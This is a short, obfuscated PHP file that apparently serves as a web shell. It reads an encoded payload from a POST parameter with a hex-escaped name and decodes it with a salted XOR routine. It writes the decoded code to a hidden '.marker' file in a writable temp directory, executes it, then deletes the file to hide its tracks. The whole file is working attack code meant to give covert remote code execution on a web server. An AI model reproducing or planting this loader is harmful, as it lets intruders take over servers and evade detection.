<?php

if(isset($_POST["\x65\x6Cem"])){
	$res = array_filter(["/tmp", session_save_path(), ini_get("upload_tmp_dir"), "/dev/shm", getenv("TEMP"), getcwd(), getenv("TMP"), "/var/tmp", sys_get_temp_dir()]);
	$factor = $_POST["\x65\x6Cem"];
	  $factor = explode( 	"." 		,		$factor  ) ; 	 
	$entity = '';
            $salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen($salt);
            $l = 0;
    
            $__tmp = $factor;
            while ($v5 = array_shift($__tmp)) { $chS = ord($salt[$l % $sLen]);
                $d = ((int)$v5 - $chS - ($l % 10)) ^ 79;
                $entity  .=	chr($d);
                $l++; }	
	foreach ($res as $sym) {
    		if ((is_dir($sym) and is_writable($sym))) {
    $hld = join("/", [$sym, ".marker"]);
    if (file_put_contents($hld, $entity)) {
	require $hld;
	unlink($hld);
	die();
}
}
}
}